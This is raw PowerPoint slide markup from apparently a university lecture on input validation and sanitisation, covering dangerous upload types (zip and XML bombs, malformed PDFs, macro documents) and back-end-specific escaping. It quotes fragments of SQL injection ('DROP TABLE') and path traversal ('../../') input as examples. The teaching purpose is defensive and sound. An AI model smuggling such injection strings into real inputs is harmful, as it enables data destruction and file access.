              <a:gd name="T15" fmla="*/ 358166 h 2968487"/>
              <a:gd name="T16" fmla="*/ 1432285 w 1941444"/>
              <a:gd name="T17" fmla="*/ 570410 h 2968487"/>
              <a:gd name="T18" fmla="*/ 1140527 w 1941444"/>
              <a:gd name="T19" fmla="*/ 716318 h 2968487"/>
              <a:gd name="T20" fmla="*/ 1087477 w 1941444"/>
              <a:gd name="T21" fmla="*/ 941828 h 2968487"/>
              <a:gd name="T22" fmla="*/ 1153788 w 1941444"/>
              <a:gd name="T23" fmla="*/ 1207133 h 2968487"/>
              <a:gd name="T24" fmla="*/ 1405760 w 1941444"/>
              <a:gd name="T25" fmla="*/ 1392844 h 2968487"/>
              <a:gd name="T26" fmla="*/ 1684265 w 1941444"/>
              <a:gd name="T27" fmla="*/ 1631614 h 2968487"/>
              <a:gd name="T28" fmla="*/ 1936246 w 1941444"/>
              <a:gd name="T29" fmla="*/ 1910183 h 2968487"/>
              <a:gd name="T30" fmla="*/ 1724043 w 1941444"/>
              <a:gd name="T31" fmla="*/ 2268335 h 2968487"/>
              <a:gd name="T32" fmla="*/ 1339457 w 1941444"/>
              <a:gd name="T33" fmla="*/ 1910183 h 2968487"/>
              <a:gd name="T34" fmla="*/ 1034426 w 1941444"/>
              <a:gd name="T35" fmla="*/ 1724471 h 2968487"/>
              <a:gd name="T36" fmla="*/ 503961 w 1941444"/>
              <a:gd name="T37" fmla="*/ 1910183 h 2968487"/>
              <a:gd name="T38" fmla="*/ 238708 w 1941444"/>
              <a:gd name="T39" fmla="*/ 2268335 h 2968487"/>
              <a:gd name="T40" fmla="*/ 159152 w 1941444"/>
              <a:gd name="T41" fmla="*/ 2599975 h 2968487"/>
              <a:gd name="T42" fmla="*/ 79576 w 1941444"/>
              <a:gd name="T43" fmla="*/ 2971385 h 29684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41444"/>
              <a:gd name="T67" fmla="*/ 0 h 2968487"/>
              <a:gd name="T68" fmla="*/ 1941444 w 1941444"/>
              <a:gd name="T69" fmla="*/ 2968487 h 296848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41444" h="2968487">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="115957" y="127000"/>
                  <a:pt x="231914" y="254000"/>
                  <a:pt x="318053" y="331304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="404192" y="408608"/>
                  <a:pt x="417444" y="481496"/>
                  <a:pt x="516835" y="463826"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="616226" y="446157"/>
                  <a:pt x="812800" y="223078"/>
                  <a:pt x="914400" y="225287"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1016000" y="227496"/>
                  <a:pt x="1027044" y="485913"/>
                  <a:pt x="1126435" y="477078"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1225826" y="468243"/>
                  <a:pt x="1400313" y="220869"/>
                  <a:pt x="1510748" y="172278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1621183" y="123687"/>
                  <a:pt x="1755914" y="154608"/>
                  <a:pt x="1789044" y="185530"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1822174" y="216452"/>
                  <a:pt x="1769166" y="293757"/>
                  <a:pt x="1709531" y="357809"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1649896" y="421861"/>
                  <a:pt x="1526209" y="510208"/>
                  <a:pt x="1431235" y="569843"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1336261" y="629478"/>
                  <a:pt x="1197113" y="653774"/>
                  <a:pt x="1139687" y="715617"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1082261" y="777460"/>
                  <a:pt x="1084470" y="859182"/>
                  <a:pt x="1086679" y="940904"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1088888" y="1022626"/>
                  <a:pt x="1099931" y="1130852"/>
                  <a:pt x="1152940" y="1205948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1205949" y="1281044"/>
                  <a:pt x="1316383" y="1320800"/>
                  <a:pt x="1404731" y="1391478"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1493079" y="1462156"/>
                  <a:pt x="1594678" y="1543878"/>
                  <a:pt x="1683026" y="1630017"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1771374" y="1716156"/>
                  <a:pt x="1928192" y="1802296"/>
                  <a:pt x="1934818" y="1908313"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1941444" y="2014331"/>
                  <a:pt x="1822174" y="2266122"/>
                  <a:pt x="1722783" y="2266122"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1623392" y="2266122"/>
                  <a:pt x="1453322" y="1998870"/>
                  <a:pt x="1338470" y="1908313"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1223618" y="1817756"/>
                  <a:pt x="1172818" y="1722782"/>
                  <a:pt x="1033670" y="1722782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="894522" y="1722782"/>
                  <a:pt x="636105" y="1817756"/>
                  <a:pt x="503583" y="1908313"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="371061" y="1998870"/>
                  <a:pt x="295966" y="2151270"/>
                  <a:pt x="238540" y="2266122"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="181114" y="2380974"/>
                  <a:pt x="185530" y="2480365"/>
                  <a:pt x="159026" y="2597426"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132522" y="2714487"/>
                  <a:pt x="106017" y="2841487"/>
                  <a:pt x="79513" y="2968487"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Fun files to upload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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.exe file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zip or XML bomb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40 Kb zip file can expands to 4GB when unzipped - aka zip of death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1Kb XML file can expand to 3 GB when XML parser expands recursive definition as part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>canonicalisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malformed PDF file to exploit flaw in PDF viewer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malformed XXX  file to exploit flaw in XXX viewer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esp. if file format is complex &amp; viewers are written in memory-unsafe languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Word or Excel document with macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>old-time favourite, but still in use</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRP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04195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Where to validate / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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8385A56B-2E81-413D-8710-DC494A913E86}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:pPr defTabSz="446407"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19460" name="Groep 2"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1000143" y="1157997"/>
            <a:ext cx="4343297" cy="1571040"/>
            <a:chOff x="1230107" y="1142410"/>
            <a:chExt cx="4787983" cy="1732547"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Afgeronde rechthoek 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3978237" y="1142410"/>
              <a:ext cx="2039853" cy="1732547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application</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19483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107" y="1570164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ight Arrow 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2544786" y="2042827"/>
              <a:ext cx="1077867" cy="28902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19485" name="TextBox 36"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2188820" y="1525811"/>
              <a:ext cx="1672928" cy="65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46407"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1633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 defTabSz="446407"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1633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input</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="en-US" sz="1633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" name="Rechthoek 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3493039" y="1545876"/>
            <a:ext cx="373643" cy="101944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 Rounded MT Bold"/>
              </a:rPr>
              <a:t>validate</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/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81029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Where to validate / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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85800" y="1124745"/>
            <a:ext cx="7918648" cy="4960144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sz="1800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rejecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t> illegal input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  upon entry makes sense</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t> date of birth in the future</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>dangerous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> (say because it contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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800" dirty="0" smtClean="0"/>
              <a:t>)  less so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Different back-ends want different forms of escaping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>SQL database  does not like  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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DROP TABLE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GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>file system does not like         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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GB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GB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en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>OS does not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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GB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GB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GB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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0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8385A56B-2E81-413D-8710-DC494A913E86}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:pPr defTabSz="446407"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p: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1017564" y="1067411"/>
            <a:ext cx="7097760" cy="1748160"/>
            <a:chOff x="1065213" y="4138223"/>
            <a:chExt cx="7825062" cy="1927225"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Afgeronde rechthoek 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7031248" y="4335073"/>
              <a:ext cx="1859027" cy="1730375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14" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold"/>
                </a:rPr>
                <a:t>back-end  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1814" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold"/>
                </a:rPr>
                <a:t>service,</a:t>
              </a:r>
            </a:p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 err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold"/>
                </a:rPr>
                <a:t>eg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold"/>
                </a:rPr>
                <a:t> SQL database</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold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856456" y="4993886"/>
              <a:ext cx="1131927" cy="42386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pic>
          <p:nvPicPr>
            <p:cNvPr id="19476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213" y="4582723"/>
              <a:ext cx="974725" cy="97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/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2317794" y="4795448"/>
              <a:ext cx="1079538" cy="2889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19478" name="TextBox 36"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1978536" y="4281782"/>
              <a:ext cx="1673225" cy="65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46407"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1633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 defTabSz="446407"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1633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input</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="en-US" sz="1633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6" name="Rechthoek 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6169204" y="5111361"/>
              <a:ext cx="158756" cy="177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/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6481953" y="5130411"/>
              <a:ext cx="158756" cy="177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3856136" y="4138223"/>
              <a:ext cx="2024133" cy="1709738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/>
                </a:rPr>
                <a:t>application</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rechthoek 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5016663" y="1577891"/>
            <a:ext cx="368640" cy="69552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814" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p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814" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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1289287" y="2566525"/>
            <a:ext cx="2034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6407"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="16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Where will this input end up?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1600" i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" name="Rechte verbindingslijn met pijl 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5320927" y="2170903"/>
            <a:ext cx="431281" cy="6566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 bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2958364" y="2044729"/>
            <a:ext cx="521280" cy="55296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hthoek 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3561724" y="1487891"/>
            <a:ext cx="381600" cy="70992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814" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p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814" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5536567" y="2788863"/>
            <a:ext cx="13363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6407"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="16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Which bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="446407"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="16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are input?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30704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3" grpId="0"/>
      <p:bldP spid="41" grpId="0" animBg="1"/>
      <p:bldP spid="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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input vs output sanitisation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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Output sanitisation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>make more sense than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input sanitisation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>because then sanitisation can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>context-sensitive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Downside: keeping track of which bits are input</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty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83F92A1B-0E72-4361-A28C-E4EFEB1403C9}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:pPr defTabSz="446407"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Afgeronde rechthoek 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5963041" y="1080361"/>
            <a:ext cx="1316160" cy="66528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633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
          </a:p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633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18437" name="Picture 2" descr="C:\Users\erikpoll\Desktop\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41" y="1307881"/>
            <a:ext cx="882720" cy="88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28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1440000">
            <a:off x="2165761" y="2200681"/>
            <a:ext cx="1164960" cy="2635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6407">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1633" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial Rounded MT Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18439" name="TextBox 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2298241" y="1542601"/>
            <a:ext cx="1517760" cy="6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6407"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1814">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="446407"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1814">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1814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Afgeronde rechthoek 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3363841" y="2426761"/>
            <a:ext cx="1546560" cy="8640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814" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
          </a:p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814" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1633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33" name="Afgeronde rechthoek 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6274081" y="1948681"/>
            <a:ext cx="1316160" cy="51696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633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1814" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial Rounded MT Bold"/>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="1814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38" name="Afgeronde rechthoek 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1120498" y="3400651"/>
            <a:ext cx="1316160" cy="84096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814" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
          </a:p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814" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
          </a:p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endParaRPr lang="en-GB" sz="1814" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial Rounded MT Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18443" name="Groep 52"/>
          <p:cNvGrpSpPr>
